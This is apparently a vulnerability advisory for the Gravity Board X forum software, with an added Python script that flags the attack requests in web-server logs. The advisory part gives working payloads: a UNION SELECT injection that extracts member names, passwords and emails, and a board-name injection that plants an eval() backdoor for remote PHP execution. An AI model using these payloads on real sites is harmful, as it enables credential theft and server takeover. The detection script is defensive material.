Gravity Board X Multiple SQL Injection Vulnerabilities and Remote Command Execution Vulnerability
Attackers can use a browser to exploit these issues. The following example URIs and data are available:

SQL injections:

http://www.example.com/index.php?action=viewprofile&member_id=slider-
http://www.example.com/index.php?action=viewboard&board_id=m0nzt3r-loleg-too'+union+select+0,concat_ws(char(58),displayname,pw,email),2+from+gbx_members+where+1='1

Code exec:

Go: http://www.example.com/index.php?action=configure
Enter Board Name: xXx";if(isset($_GET[c]))eval($_GET[c]);#
Go: http://www.example.com/index.php?ok=phpinfo();

The following exploit is available:
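For defenders reviewing web-server logs, the request shapes listed above can be flagged with a short script. This is an added detection example, not the exploit the advisory refers to and not part of the original page. It assumes that member_id and board_id are plain integers in normal use; the regular expressions and sample requests are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: these parameters are integer keys in normal Gravity Board X use.
ID_PARAMS = {"member_id", "board_id"}
# Heuristics (constructed for this example): quote breakout, UNION SELECT, concat_ws().
SQLI = re.compile(r"'|\bunion\b.+\bselect\b|concat_ws\s*\(", re.I)
# A whole parameter value that looks like a PHP call, e.g. name(args);
PHP_CALL = re.compile(r"^\s*[A-Za-z_]\w*\s*\(.*\)\s*;?\s*$")


def classify(uri):
    """Return a sorted list of findings for one request URI."""
    parts = urlsplit(uri)
    if not parts.path.endswith("index.php"):
        return []
    findings = set()
    # parse_qsl URL-decodes values and turns '+' into a space.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in ID_PARAMS:
            if not re.fullmatch(r"[0-9]+", value):
                findings.add("non-numeric " + name)
            if SQLI.search(value):
                findings.add("sql-injection pattern in " + name)
        elif PHP_CALL.match(value):
            findings.add("php call in parameter " + name)
    return sorted(findings)


def scan(uris):
    """Map each suspicious URI to its findings; clean requests are omitted."""
    return {u: f for u in uris if (f := classify(u))}


# Constructed sample requests (not taken from real logs).
SAMPLE = [
    "/index.php?action=viewboard&board_id=7",
    "/index.php?action=viewprofile&member_id=12abc",
    "/index.php?action=viewboard&board_id=x'+union+select+1,2,3",
    "/index.php?ok=phpinfo();",
]

if __name__ == "__main__":
    for uri, findings in scan(SAMPLE).items():
        print(uri, "->", ", ".join(findings))
```

The board-name step of the code-execution case is submitted through the configure form, so it only appears in logs that record request bodies; the script covers the query-string side.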